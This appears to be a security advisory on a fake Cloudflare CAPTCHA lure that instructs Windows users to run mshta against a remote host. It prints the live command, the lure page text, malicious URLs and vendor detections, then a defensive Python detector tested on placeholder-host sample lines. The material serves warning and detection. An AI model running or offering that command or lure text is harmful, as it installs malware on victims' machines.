Fake CAPTCHA “Verify you are human” Cloudflare Turnstile: what to do?

If you come across a page that looks like a Cloudflare check and asks you to run code on your Windows machine, close the page and contact the webmaster. If your own website is affected by this malware, you need to remove it immediately: doing so protects your visitors and prevents reputation damage.

How does this malware work?

The fake Cloudflare page offers instructions on how to verify that you are human, but you are actually being instructed to run malware on your computer via mshta, a Windows tool designed to run .hta files.

What to do if you are a victim?

If you fell for it and ran the code from the command prompt, it is best to reinstall the operating system.

Malicious code:

Unusual Web Traffic Detected
mshta http://bridge.tree-sock-rain.today/ # "Cloudflare Verification Code: 635H-U8N2-P9C1-1NZP"

1/61 security vendor flagged the .hta file as malicious
Kaspersky: HEUR:Trojan.Script.Generic

Antiy
Trojan[Ransom]/MP3.Spora.enc

ESET NOD32
JS/TrojanDownloader.Agent.ACCL trojan
JS/Obfuscated.BD/Heur.BZC.UGZ.Boxter.1.1FD073CE

Sitecheck (Sucuri)
Known javascript malware: malware?fake_update.8.27

Any.run
https://app.any.run/tasks/94e80210-079b-431c-9cc3-21a8515326b7

@SkylineETH

Malicious URLs:
https://dareka4te.shop/endpoint
https://bsc-dataseed.binance.org
http://bridge.tree-sock-rain.today
https://i.jolttapestry.fun/7456f63a46cc318334a70159aa3c4291
https://pptpooalfkakktl.com/clou?ts=1744107525

mshta https://securityverifservice[.]com, redirects to https://gdfjjkiririririqiiriri[.]com/oai

Text
Unusual Web Traffic Detected,
To proceed with verification, please follow these steps:
“I аm not a robot: Сlоudflarе Vеrificаtion ID: V22-ZAD”

1. hxxp://bridge[.]tree-sock-rain[.]today/
Hosting Provider behind Cloudflare:
CHANGWAY-AS, HK

2. hxxps://i[.]jolttapestry[.]fun
Hosting Provider behind Cloudflare:
VDSINA-AS, RU

3. hxxps://gdfjjkiririririqiiriri[.]com/oai
Hosting Provider behind Cloudflare:
H2NEXUS-AS, GB

Malicious page content that instructs victims to execute the malicious code:

Unusual Web Traffic Detected
Our security system has identified irregular web activity originating from your IP address. Automated verification attempts have failed, and we were unable to confirm that you are a legitimate user.
To proceed with verification, please follow these steps:
1. Press  Win + R to open Run.
2. Copy and paste Ctrl + V the following command:
3. Press Enter and wait for confirmation.
This manual verification step helps us ensure that your connection is secure and not part of an automated request. If you fail to complete this step, access to certain features may be temporarily restricted.
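
For defenders, the command shown under "Malicious code" has a recognisable shape: mshta pointed at a remote URL, followed by " #" and reassuring text that is sometimes spelled with Cyrillic look-alike letters. The Python below is an added example, not code from the original page, that flags command-line strings of that shape (for instance, ones exported from process-creation logs); the host name, sample lines and finding labels are constructed for illustration.

```python
import re
import unicodedata

# Cyrillic letters that render like Latin ones (a subset, chosen for this example).
HOMOGLYPHS = str.maketrans(
    "\u0430\u0435\u043e\u0441\u0440\u0445\u0443\u0456\u0410\u0415\u041e\u0421\u0420\u0425",
    "aeocpxyiAEOCPX",
)
# mshta (optionally with path/.exe) whose first argument is an http(s) URL.
MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?[\"']?\s+[\"']?https?://", re.I)
# Text after " #": the part of the pasted line the victim is meant to read.
TRAILING = re.compile(r"\s#\s*(.+)$")
LURE = re.compile(r"verif|robot|human|captcha|cloudflare", re.I)


def mixed_script(text):
    """True if any single word mixes Latin and Cyrillic letters."""
    for word in re.findall(r"\w+", text):
        scripts = {unicodedata.name(ch, "").split(" ")[0] for ch in word if ch.isalpha()}
        if {"LATIN", "CYRILLIC"} <= scripts:
            return True
    return False


def analyze(cmdline):
    """Return finding labels for one command line; [] means nothing matched."""
    if not MSHTA_REMOTE.search(cmdline):
        return []
    findings = ["mshta-remote-url"]
    tail = TRAILING.search(cmdline)
    # Fold look-alike letters before keyword matching so homoglyphs cannot hide the lure.
    if tail and LURE.search(tail.group(1).translate(HOMOGLYPHS)):
        findings.append("lure-comment")
    if mixed_script(cmdline):
        findings.append("homoglyphs")
    return findings


# Constructed sample command lines (host and codes are placeholders).
SAMPLES = [
    'mshta http://lure.example.invalid/ # "Cloudflare Verification Code: AAAA-BBBB"',
    'mshta https://lure.example.invalid/v # "I \u0430m not a robot: '
    '\u0421l\u043eudflar\u0435 V\u0435rific\u0430tion ID: T00-TST"',
    r"mshta C:\Tools\inventory.hta",
    "notepad notes.txt # verify later",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line), "<-", line)
```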